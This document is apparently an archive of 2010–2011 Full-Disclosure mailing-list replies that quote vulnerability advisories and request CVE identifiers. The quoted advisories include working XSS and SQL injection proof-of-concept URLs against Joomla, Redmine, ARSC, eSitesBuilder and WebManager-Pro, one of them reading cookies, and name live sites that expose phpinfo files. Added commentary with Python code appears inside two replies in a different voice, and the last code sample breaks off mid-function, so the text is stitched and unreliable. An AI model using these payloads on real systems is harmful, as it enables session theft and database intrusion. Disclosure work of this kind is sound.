> Joomla is written in PHP, uses object-oriented programming (OOP)
> techniques and software design patterns, stores data in a MySQL
> database, and includes features such as page caching, RSS feeds,
> printable versions of pages, news flashes, blogs, polls, search, and
> support for language internationalization.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Several parameters (QueryString, option, searchword) in Joomla! Core
> components (com_content, com_contact, com_newsfeeds, com_search) are
> not properly sanitized upon submission to the /index.php url, which
> allows an attacker to conduct a Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser.
> 
> 
> 4. VERSION AFFECTED
> 
> 1.6.3 and lower
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> 
> component: com_contact , parameter: QueryString (Browser: All)
> ===
> 
> http://attacker.in/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";>alert(/XSS/)
> 
> 
> component:com_content , parameter:  QueryString (Browser: All)
> ===
> 
> http://attacker.in/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=>alert(/XSS/)
> 
> 
> component: com_newsfeeds , parameter: QueryString (Browser: All)
> =
> 
> http://attacker.in/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";>alert(/XSS/)&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
> 
> 
> parameter: option (Browser: All)
> 
> 
> http://attacker.in/joomla163_noseo/index.php?option=";>alert(/XSS/)&task=reset.request
> 
> 
> component: com_search, parameter: searchword (Browser: IE, Konqueror)
> =
> 
> [REQUEST]
> POST /joomla163/index.php HTTP/1.1
> Referer: http://attacker.in/joomla163/
> User-Agent: Konqueror/4.5
> Cache-Control: no-cache
> Content-Type: application/x-www-form-urlencoded
> Host: attacker.in
> Accept-Encoding: gzip, deflate
> Content-Length: 125
> 
> option=com_search&searchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&task=search
> [/REQUEST]
> 
> This searchword XSS was identified via source code:
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg
> 
> 
> 6. IMPACT
> 
> Attackers can compromise currently logged-in user/administrator
> session and impersonate arbitrary user actions available under
> /administrator/ functions.
> 
> 
> 7. SOLUTION
> 
> Upgrade to Joomla! 1.6.4 or higher
> 
> 
> 8. VENDOR
> 
> Joomla! Developer Team
> http://www.joomla.org
> 
> 
> 9. CREDIT
> 
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
> 
> 
> 10. DISCLOSURE TIME-LINE
> 
> 2011-05-26: notified vendor
> 2011-06-28: vendor released fix
> 2011-06-28: vulnerability disclosed
> 
> 
> 11. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
> Vendor Advisory URL:
> http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html
> XSS FAQ: http://www.cgisecurity.com/xss-faq.html
> OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
> CWE-79: http://cwe.mitre.org/data/definitions/79.html
> 
> 
> #yehg [2011-06-28]

CVE-2011-2509 can be used for this issue. Could the Joomla people update the 
http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html 
advisory? Thank you.

References:
http://seclists.org/oss-sec/2011/q2/730

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS Vulnerability in Redmine 1.0.1 to 1.1.1

2011-06-15 Thread Henri Salo
On Wed, Apr 06, 2011 at 01:22:06PM +0300, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS vulnerability in Redmine
> Software :  all Redmine versions from 1.0.1 to 1.1.1
> Vendor Homepage :  http://www.redmine.org
> Vulnerability Type :  Cross-Site Scripting
> Severity :  High
> Researcher :  Mesut Timur 
> Advisory Reference :  NS-11-004
> 
> Description
> --
> Redmine is a flexible project management web application written using
> Ruby on Rails framework.
> 
> Details
> ---
> Redmine is affected by a XSS vulnerability in versions from 1.0.1 to 1.1.1.
> Example PoC url is as follows :
> 
> http://example.com/projects/hg-helloworld/news/%22onload=%22alert%281%29
> 
> 
> You can read the full article about Cross-Site Scripting
> vulnerabilities from here :
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
> 
> Solution
> ---
> Upgrade to the latest Redmine version (1.1.2).
> 
> Credits
> ---
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> ---
> 1. Vendor URL: http://www.redmine.org/news/53
> 2. MSL Advisory Link :
> http://www.mavitunasecurity.com/XSS-vulnerability-in-Redmine/
> 3. Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> ---
> Netsparker can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allow it to be dead accurate in
> reporting; hence it's the first and the only False Positive Free web
> application security scanner.
> 
> -- 
> Netsparker Advisories, 
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

You can use the CVE-2011-1723 identifier for this issue. References:

http://osvdb.org/71564

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] IL and XSS vulnerabilities in multiple themes for WordPress

2011-06-07 Thread Henri Salo
On Tue, Jun 07, 2011 at 06:57:44PM +0300, MustLive wrote:
> Hi David!
> 
> You need to look harder ;-). It looks like you checked these two themes on those 
> sites whose admins deleted this file. There are admins who understand 
> that scripts with phpinfo must not be on working sites (but those are rare cases, 
> and the larger part of the sites with affected themes for WP contain test.php).
> 
> Yes, I've checked all these 15 themes (I've tested even more and wasted a lot 
> of time on it, but found it exactly in these 15 themes). I've found them on live 
> web sites on the Internet, as I mentioned earlier.
> 
> Here are examples of the sites with test.php in Typebased and NewsPress 
> themes:
> 
> http://thenetexperiment.com/wp-content/themes/typebased/includes/test.php
> 
> http://coporan.3x.ro/wp-content/themes/newspress/includes/test.php
> 
> For example, in April I was trying to find test.php in these 15 and other 
> themes at WooThemes' demo site, but they don't have this file in any of their 
> themes (among those tested by me). So for their own sites they 
> understand the risk, but when selling holes for a large price to their 
> clients, they no longer understand the risk and position it as a 
> feature :-).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site

Please don't waste your time anymore :)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] HTB22997: XSS in A Really Simple Chat (ARSC)

2011-06-03 Thread Henri Salo
On Wed, Jun 01, 2011 at 02:10:31PM +0200, advis...@htbridge.ch wrote:
> Vulnerability ID: HTB22997
> Reference: 
> http://www.htbridge.ch/advisory/xss_in_a_really_simple_chat_arsc.html
> Product: A Really Simple Chat (ARSC)
> Vendor: http://www.reallysimplechat.org/ ( http://www.reallysimplechat.org/ ) 
> Vulnerable Version: 3.3-rc2
> Vendor Notification: 12 May 2011 
> Vulnerability Type: XSS (Cross Site Scripting)
> Risk level: Medium 
> Credit: High-Tech Bridge SA Security Research Lab ( 
> http://www.htbridge.ch/advisory/ ) 
> 
> Vulnerability Details:
> User can execute arbitrary JavaScript code within the vulnerable application.
> The vulnerability exists due to failure in the "dereferer.php" script to 
> properly sanitize user-supplied input in "arsc_link" variable.
> Successful exploitation of this vulnerability could result in a compromise of 
> the application, theft of cookie-based authentication credentials, disclosure 
> or modification of sensitive data.
> The following PoC is available:
> 
> http://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

This can be referred to as CVE-2011-2180. Could you please update your website 
advisory?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] HTB22999: Multiple SQL Injections in A Really Simple Chat (ARSC)

2011-06-03 Thread Henri Salo
On Wed, Jun 01, 2011 at 02:10:13PM +0200, advis...@htbridge.ch wrote:
> Vulnerability ID: HTB22999
> Reference: 
> http://www.htbridge.ch/advisory/multiple_sql_injections_in_a_really_simple_chat_arsc.html
> Product: A Really Simple Chat (ARSC)
> Vendor: http://www.reallysimplechat.org/ ( http://www.reallysimplechat.org/ ) 
> Vulnerable Version: 3.3-rc2
> Vendor Notification: 12 May 2011 
> Vulnerability Type: SQL Injection
> Risk level: High 
> Credit: High-Tech Bridge SA Security Research Lab ( 
> http://www.htbridge.ch/advisory/ ) 
> 
> Vulnerability Details:
> The vulnerability exists due to failure in the "/base/admin/edit_user.php" 
> script to properly sanitize user-supplied input in "user" variable.
> Attacker can alter queries to the application SQL database, execute arbitrary 
> queries to the database, compromise the application, access or modify 
> sensitive data, or exploit various vulnerabilities in the underlying SQL 
> database.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
> 
> The vulnerability exists due to failure in the "/base/admin/edit_layout.php" 
> script to properly sanitize user-supplied input in "arsc_layout_id" variable.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
> 
> The vulnerability exists due to failure in the "/base/admin/edit_room.php" 
> script to properly sanitize user-supplied input in "arsc_room" variable.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

These issues can be referred to as CVE-2011-2181. Could you please update the website 
advisory?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] find11.html

2011-06-02 Thread Henri Salo
On Tue, May 31, 2011 at 01:16:48PM +1000, Daniel Hood wrote:
> Anyone else seen this going around?
> 
> I've got a couple of links coming through for this via hacked email
> accounts. Looks like it's installing FakeAV.
> 
> Links include:
> www [dot] epo4 [dot] com [slash] find11.html
> 
> I can't seem to find anything on google about it yet though.
> 
> Dan

Could someone share the sample with me? It seems that for me the domain does not 
resolve.

Resolving safetylife2011.org... failed: Name or service not known.

Bit strange..

foo@bar:~$ host safetylife2011.org
safetylife2011.org has address 84.127.74.15
safetylife2011.org has address 71.37.32.247
safetylife2011.org has address 82.159.38.56
safetylife2011.org has address 85.84.60.87
safetylife2011.org has address 46.223.138.2 (TCP 80 not responding)

Every online host is running the nginx 0.8.54 web server.

Best regards,
Henri Salo



Re: [Full-disclosure] [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

2011-05-21 Thread Henri Salo
On Sat, Apr 23, 2011 at 06:11:12PM -0700, Jamie Cameron wrote:
> Hi Javier,
> 
> Thanks for reporting this - I hadn't considered this attack
> vector, as I didn't realize that chfn could be used to modify a user's
> real name.
> 
> I have created a fix which you can see at :
> 
> https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881
> 
> Also an update for the Users and Groups module can be found at 
> http://www.webmin.com/updates.html , and will be available from within
> the Webmin UI.
> 
>  - Jamie

In which Webmin release will this be fixed? Do you have a CVE identifier for this
yet?

Best regards,
Henri Salo



[Full-disclosure] SQL Injection in Pixie

2011-05-14 Thread Henri Salo
Are you going to react to this at all? This isn't even the first time: 
http://www.securityfocus.com/archive/1/517931

Best regards,
Henri Salo



Re: [Full-disclosure] MalBox Release! A Program Behavior Analysis System!

2011-05-14 Thread Henri Salo
On Sat, May 14, 2011 at 10:55:30PM +0100, Chris M wrote:
> Not convinced.
> 
> Tried to upload a few samples, "only support EXE files"  no DLLs? yet
> you take URLs? only to exes?
> 
> The file I upped was a PE file. Just with a renamed extension.
> 
> Also submitted a couple of "known bad" files and got a list of tcp ports
> back how is this operating? _SHARED_ sandbox?
> 
> Whats it based on?
> 
> More information would be appreciated :)
> 
> -C

I can still get HTTP 500 errors easily. That service is running a vulnerable
version of Tomcat and still reports wrong TCP connections for any scanned
URL/EXE sample. JS checks aren't done in the backend.

Best regards,
Henri Salo



Re: [Full-disclosure] MalBox Release! A Program Behavior Analysis System!

2011-05-14 Thread Henri Salo
On Fri, May 13, 2011 at 11:09:46PM +0800, CnCxzSec衰仔 wrote:
> As many questions has been raised about this online tool, we have contacted
> the authors of this tools. Here is their answer.
> 
> *Hi,
> Malbox  is developed by a couple of students of
> botnet research team in Network Security Lab of  Xi’an Jiaotong
> University(one of the top universities in China). At first it was used  to
> analyze botnet malwares captured by  honeynet, then we decided to release a
> web version, in order to supply a malware analysis service to people who may
> need it, and to collect more  malware samples for research.
> We may do “not good enough”, but we won’t do “bad”.*
> 
> Best regards,
> Shane Zhao

Great service.. or not:

HTTP 500
Apache Tomcat/7.0.11

java.lang.StringIndexOutOfBoundsException: String index out of range: -1
java.lang.String.substring(String.java:1943)
java.lang.String.substring(String.java:1916)
upload.UploadServlet.doGet(UploadServlet.java:133)
upload.UploadServlet.doPost(UploadServlet.java:91)
javax.servlet.http.HttpServlet.service(HttpServlet.java:641)
javax.servlet.http.HttpServlet.service(HttpServlet.java:722)

Best regards,
Henri


Re: [Full-disclosure] Requesting/Reserving CVE Question

2011-04-28 Thread Henri Salo
On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com wrote:
> Hello all,
> 
> First off, if this isn't the place to ask this question, I apologize, and
> feel free to ignore this e-mail.  
> 
> I've found a couple vulnerabilities in a web forum/portal/etc. product
> called IP.Board.  I was looking to reserve a CVE number, and I attempted to
> contact the address Mitre lists for reserving one, however, it's been
> nearly a month and I have not received anything back from them.  This is
> the first vulnerability I have found, and have never requested/reserved a
> CVE before, so I am a little unfamiliar with the process (although based
> off of the following website, it looks like all I need to do is send an
> e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  
> 
> I've sent follow up e-mails and I've received no response.  What my
> question to you all is how long does this process take?  Is there something
> else that should be done, or someone else the request should be sent to? 
> What's time normal time frame from requesting a CVE number to hearing back
> from them?
> 
> Thanks for any help/info/advice.  I appreciate it.
> 
> Chris

No luck. With open-source you could have tried:
http://oss-security.openwall.org/wiki/mailing-lists/oss-security

Best regards,
Henri Salo



Re: [Full-disclosure] Multiple vulnerabilities in MyBB

2011-04-27 Thread Henri Salo
On Fri, Apr 22, 2011 at 07:21:55PM +0300, MustLive wrote:
> Hello list!
> 
> I want to warn you about Information Leakage, Abuse of Functionality,
> Insufficient Anti-automation and Brute Force vulnerabilities in
> MyBB.
 
> Information Leakage (WASC-13):


Oh, this is better than most comedy movies.

Best regards,
Henri



Re: [Full-disclosure] New vulnerabilities in eSitesBuilder

2011-04-17 Thread Henri Salo
On Sat, Apr 16, 2011 at 07:56:18PM -0500, security curmudgeon wrote:
> 
> : SecurityVulns ID: 11310.
> 
> : XSS (WASC-08):
> : 
> : 
> http://site/console/forget.php?e_mail=%3Cscript%3Ealert(document.cookie)%3C/script%3E&seenform=y
> 
> How many times are you going to disclose this?
> 
> http://seclists.org/bugtraq/2010/Jun/189
> 
> http://seclists.org/fulldisclosure/2010/Aug/306
> 
> http://seclists.org/fulldisclosure/2010/Dec/465
> 
> The June disclosure has a timeline indicating you had "announced" it 
> almost two years prior to that:
> 
> 21.11.2007 - found some of these vulnerabilities.
> 11.08.2008 - announced at my site.
> 11.08.2008 - informed admins of web site.
> 11.08.2008 - found others of these vulnerabilities.
> 11.02.2009 - disclosed at my site about first vulnerabilities.
> 05.05.2009 - disclosed at my site about other vulnerabilities.
> 06.05.2009 - informed admins of web site about other vulnerabilities.
> 18.06.2010 - disclosed at my site about vulnerabilities in eSitesBuilder
> (after I found that they concerned with eSitesBuilder).
> 19.06.2010 - informed developers (in case if owners of vulnerable site
> didn't informed them in previous years).
> 
> Seriously, how long can you milk a single XSS here?
> 
> : 2010.10.08 - announced at my site.
> : 2010.10.08 - informed developers.
> : 2010.12.16 - disclosed at my site.
> : 
> : I mentioned about these vulnerabilities at my site
> : (http://websecurity.com.ua/4588/).
> 
> http://websecurity.com.ua/4300/
> 
> Several times, yes you did.

You are wasting your time. MustLive is an idiot :)

Best regards,
Henri



Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-11-14 Thread Henri Salo
On Fri, 5 Nov 2010 21:41:42 +0800
YGN Ethical Hacker Group  wrote:

> This public disclosure has achieved its aim.
> 
> Joomla! Team finally patched this hole.
> 
> 
> http://developer.joomla.org/security/news/9-security/10-core-security/323-20101101-core-sqli-info-disclosurevulnerabilities.html
> 
> Upgrade to the latest Joomla! version (1.5.22 or later).
> 
> 
> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
> 
> 
> 1. VULNERABILITY DESCRIPTION
> 
> 
> Potential SQL Injection Flaws were detected Joomla! CMS version
> 1.5.20. These flaws were reported along with our Cross Scripting Flaw
> which was fixed in 1.5.21. Developers believed that our reported SQL
> Injection flaws are not fully exploitable because of Joomla! built-in
> string filters and were not fixed in 1.5.21 which is currently the
> latest version.
> 
> 
> 2. PROOF-OF-CONCEPT/EXPLOIT
> 
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg
> 
> 
> 3. DISCLOSURE TIME-LINE
> 
> 
> 2010-10-06  : Notified Joomla! Security Strike Team
> 2010-11-01  : Vulnerability disclosed
> 2010-11-05  : Patched version (1.5.22) released
> 
> 4. VENDOR
> 
> Joomla! Developer Team
> http://www.joomla.org
> http://www.joomla.org/download.html

CVE-2010-4166 can be used when dealing with this issue.

Best regards,
Henri Salo


Re: [Full-disclosure] [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog

2010-08-24 Thread Henri Salo
On Mon, 23 Aug 2010 10:36:42 +0700
"Bkis"  wrote:

> [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog
> 
> 1. General Information
> 
> OpenBlog is a free software for developing blogging platform.
> OpenBlog is written on PHP language and available at
> http://www.open-blog.info. In August 2010, Bkis Security discovered
> some XSS, CSRF vulnerabilities on this software; especially, there is
> a vulnerability which might allow privilege elevation on OpenBlog
> 1.2.1. Taking advantage of this vulnerability, hacker might execute
> malicious code on user's browser or even get control of Blog. Bkis
> has sent its warning to the developer.
> 
> Details: http://security.bkis.com/?p=1382
> SVRT Advisory: Bkis-04-2010
> Initial vendor notification: 08/09/2010
> Release Date: 08/23/2010
> Update Date: 08/23/2010
> Discovered by: Duong Manh Linh, Truong Tu Hai, Nguyen Hoang Vinh -
> Bkis Attack Type: Bypass Authentication, XSS, CSRF
> Security Rating: High
> Impact: Code Execution
> Affected Software: Openblog< v1.2.1
> 
> 2. Technical Details
> 
> The most dangerous vulnerability resides on session module of
> OpenBlog. Exploiting this vulnerability, hacker can sign in a normal
> user' account but obtain administrator' privileges. This is due to
> the weakness in user's rights checking and authenticating mechanism,
> resulting in the high possibility of faking administrators'
> privileges.   
> 
> Besides, Bkis also found some XSS and CSRF vulnerabilities on the
> following OpenBlog's functions: 
> 
> XSS holes are found on the following modules: 
> - Create a new post 
> - Edit a post
> - Create a new page
> 
> Because these modules' input variables are not adequately checked and
> filtered, hacker might insert his code into the path's links. If a
> user logins to his Blog and clicks the link, hacker's malicious code
> (JavaScript) will be executed, leading to the loss of user's personal
> information saved on the browser.  
> 
> CSRF vulnerabilities are found on the following modules: 
> - Edit an user
> - Setting
> - Templates
> - Disable/Enable Sidebar  
> - Feed settings
> - Bookmarking
> - New post
> - Edit a post
> - Delete a post
> - New page
> - Edit a page
> - Delete a page
> - New navigation item
> - Edit a navigation item
> - New link
> - Edit a link
> - Delete a link
> - New category
> - Edit a category
> - Delete a category
> - Delete a comment
> - Delete an user
> 
> OpenBlog does not require user's confirmation when performing the
> above functions. Therefore, users might be tricked into performing
> unwanted actions without their consent, like clicking faulty links,
> etc. Specifically, hacker might fool Blog's administrators into
> deleting, editing the posts on the Blog.
> 
> 3. Solution
> 
> Rating the vulnerability as critical, Bkis recommends organizations,
> individuals using OpenBlog be cautious with links of unknown origins.
> At the same time, users should keep themselves updated with the
> developer's information to get timely update.
> 
> 
> --
> Bkis (www.bkis.com)
> Blog (blog.bkis.com)

Do you have CVE-identifier for these vulnerabilities?

Best regards,
Henri Salo


Re: [Full-disclosure] FuzzDiff tool

2010-08-17 Thread Henri Salo
On Mon, 26 Jul 2010 16:53:28 -0400
Dan Rosenberg  wrote:

> Hello,
> 
> I'd like to announce FuzzDiff, a simple tool to help make crash
> analysis during file format fuzzing a bit easier.  I'm sure many
> people have written similar tools for their own purposes, but I
> haven't seen any that are publicly available.  Hopefully at least one
> person finds it useful.
> 
> When provided with a fuzzed file, a corresponding original un-fuzzed
> file, and the path to the targeted program, FuzzDiff will selectively
> "un-fuzz" portions of the fuzzed file while re-launching the
> application to monitor for crashes.  This will yield a file that still
> crashes the target application, but contains a minimum set of changes
> from the original, un-fuzzed file.  This can be useful in pinning down
> the exact cause of a crash.
> 
> The tool is written in Python and currently only works on Unix-based
> systems, since it monitors for crashes by checking for SIGSEGV.  It
> also assumes that the target program adheres to the syntax "[program]
> [args] [input file]".  Both of these limitations can be easily worked
> around.  The code is hardly what I'd call production-ready, but it
> gets the job done.
> 
> The tool is available at:
> http://vsecurity.com/resources/tool
> 
> Happy hacking,
> Dan Rosenberg

Please open a bug tracker for FuzzDiff and put the program under some
version control software.

You have a temporary file vulnerability in FuzzDiff
(5b6b5c6c22c1103b4169b9fe6e7bfbc3
c0ce0235f8f0026988c60a3217233c36d829ecdf). Maybe you want to use
this module: http://docs.python.org/library/tempfile.html

Best regards,
Henri Salo
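Henri's pointer to the tempfile module is the right fix for the class of bug he names: a scratch file created under a fixed name in a shared directory. As an added example, not FuzzDiff's code, the constructed script below shows that predictable-name pattern beside mkstemp, and a small scenario inside a private temporary directory in which a symlink planted at the fixed name redirects the tool's write onto another file while the mkstemp path is unaffected; all names are mine.

```python
import os
import stat
import tempfile

def unsafe_scratch_path(shared_dir, tag="fuzzdiff"):
    # Predictable name: anyone who can write shared_dir can pre-create it
    # (constructed stand-in for the pattern, not FuzzDiff's actual code).
    return os.path.join(shared_dir, "%s.tmp" % tag)

def write_scratch_unsafe(shared_dir, data, tag="fuzzdiff"):
    """The pattern being objected to: open() a fixed name for writing.
    If another local user planted a symlink there, the write lands on
    whatever the symlink points at."""
    path = unsafe_scratch_path(shared_dir, tag)
    with open(path, "wb") as f:
        f.write(data)
    return path

def write_scratch_safe(data, shared_dir=None, prefix="fuzzdiff-"):
    """mkstemp opens with O_CREAT|O_EXCL and mode 0600 under an unpredictable
    name.  A pre-placed file or symlink at a candidate name makes that open
    fail instead of being followed, and mkstemp moves on to another name."""
    fd, path = tempfile.mkstemp(prefix=prefix, suffix=".bin", dir=shared_dir)
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
    except BaseException:
        os.unlink(path)
        raise
    return path

def is_private_regular_file(path):
    """True only for a regular file (not a symlink) with owner-only mode."""
    st = os.lstat(path)  # lstat: a symlink must not pass as a file
    return stat.S_ISREG(st.st_mode) and stat.S_IMODE(st.st_mode) == 0o600

def symlink_clobber_demo():
    """Constructed scenario showing why the fixed name matters: a 'victim'
    file is overwritten through a planted symlink, while the mkstemp file
    comes out private.  Returns (victim_contents_after, safe_path_is_private)."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.txt")
        with open(victim, "w") as f:
            f.write("original")
        # Someone else pre-plants a symlink at the predictable name.
        os.symlink(victim, unsafe_scratch_path(d))
        write_scratch_unsafe(d, b"clobbered")
        with open(victim) as f:
            after = f.read()
        safe_path = write_scratch_safe(b"payload", shared_dir=d)
        return after, is_private_regular_file(safe_path)

if __name__ == "__main__":
    print(symlink_clobber_demo())  # ('clobbered', True)
```

The mode check is done with lstat on purpose: stat would follow a symlink and report the target's mode, which is the same trap the unsafe path falls into. For scratch files that only one process needs, tempfile.TemporaryFile or NamedTemporaryFile give the same guarantees with automatic cleanup.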

Re: [Full-disclosure] SQL Injection vulnerability in CMS WebManager-Pro

2010-08-12 Thread Henri Salo
On Wed, 11 Aug 2010 21:04:51 +0300
"MustLive"  wrote:

> Hello Full-Disclosure!
> 
> I want to warn you about SQL Injection vulnerability in CMS
> WebManager-Pro.
> 
> SQL Injection:
> 
> http://site/index.php?content_id=-1%20or%20version()=4
> 
> Affected software:
> 
> Vulnerable are CMS WebManager-Pro v.7.4.3 (version from FGS_Studio)
> and previous versions. Original version of CMS WebManager-Pro isn't
> vulnerable (there are two different versions of this CMS from
> different developers).
> 
> I mentioned about this vulnerability at my site
> (http://websecurity.com.ua/3576/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

Did you ask for a CVE identifier for this issue? Did you report this to
the developers? You should include more information in your reports.
For example, which version isn't affected, if any.

If I am correct this is an English-speaking mailing list, so we are not
interested in your www-page when the articles are in a language that
most of us can't read. The page does not seem to include the
information I am looking for.

Best regards,
Henri Salo


Re: [Full-disclosure] 2Wire Broadband Router Session Hijacking Vulnerability

2010-08-09 Thread Henri Salo
On Mon, 9 Aug 2010 23:12:29 +0800
YGN Ethical Hacker Group  wrote:

> ==
> 2Wire Broadband Router Session Hijacking Vulnerability
> ==
> 
> 
> 1. OVERVIEW
> 
> The 2Wire Broadband Router is vulnerable to Session Hijacking flaw
> which attackers can compromise the router administrator session.
> 
> 
> 2. PRODUCT DESCRIPTION
> 
> 2Wire routers, product of 2Wire, are widely-used Broadband routers in
> SOHO environment.
> They are distributed through most famous ISPs (see -
> http://2wire.com/?p=383) with ready-to-use pre-configured settings.
> Their Wireless SSIDs are well-known as "2WIRE" prefix.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> The web-based management interface of 2Wire Broadband router does not
> generate truly unique random session IDs for a logged-in
> administrator user.
> This allows attackers to brute-force guess a valid session ID to
> compromise the administrator session.
> For more information about this kind of weakness,
> refer to CWE-330: Use of Insufficiently Random Values and CWE-331:
> Insufficient Entropy.
> 
> 
> 4. VERSIONS AFFECTED
> 
> Tested against:
> Model: 2700HGV-2 Gateway
> Hardware Version: 2700-100657-005
> Software Version: 5.29.117.3
> 
> Other versions might be affected as well.
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_tokens_captured_webscarab
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_tokens_captured_burp
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp.jpg
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp-02.jpg
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp-03.jpg
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp-04.jpg
> 
> 
> 6. IMPACT
> 
> Attackers can compromise 2wire administrator session through automated
> tools and modify any settings they want.
> 
> 
> 7. SOLUTION
> 
> There is no upgrade/patch currently available. 2wire support could not
> estimate when the upgrade is available.
> Also, 2wire users must be aware of other unfixed vulnerabilities
> stated in references section.
> 
> 
> 8. VENDOR
> 
> 2Wire Inc
> http://www.2wire.com
> About 2Wire - http://www.2wire.com/index.php?p=486
> 
> 
> 9. CREDIT
> 
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
> 
> 
> 10. DISCLOSURE TIME-LINE
> 
> 07-25-2010: vulnerability discovered
> 07-29-2010: notified vendor
> 08-02-2010: vendor responded/verified
> 08-09-2010: vendor did not respond when fix/upgrade would be available
> 08-09-2010: vulnerability disclosed
> 
> 
> 11. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/2wire/[2wire]_session_hijacking_vulnerability
> Other unfixed 2Wire Vulnerabilities: http://www.hakim.ws/
> Related WebGoat Lesson:
> http://yehg.net/lab/pr0js/training/view/owasp/webgoat/WebGoat_SessionMan_SessionHijackingWithJHijack/
> http://jeremiahgrossman.blogspot.com/2008/04/intranet-hack-targeting-at-2wire-dsl.html
> http://www.routerzone.eu/wiki/index.php/Hacking_the_2Wire_1800
> 
> 
> #yehg [08-09-2010]
> 
> 
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd

Does this issue have a CVE identifier assigned?

Best regards,
Henri Salo

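The advisory's finding is a CWE-330/331 problem: session IDs that are unique but not unpredictable, so an attacker who has seen one can enumerate its neighbours. As an added example, not from the advisory or 2Wire's firmware, here is a small Python check of the kind the linked screenshots show being done with Burp's sequencer: a constructed counter-based generator beside secrets.token_hex, with a per-position entropy estimate and a sequential-step test that flags the weak one. Generator and function names are mine.

```python
import math
import secrets
from collections import Counter

def weak_token(counter):
    """Constructed weak generator: a session counter rendered as fixed-width
    hex.  Every token is unique, but consecutive ones differ by one, so an
    observed token predicts the ones issued before and after it."""
    return "%016x" % counter

def strong_token():
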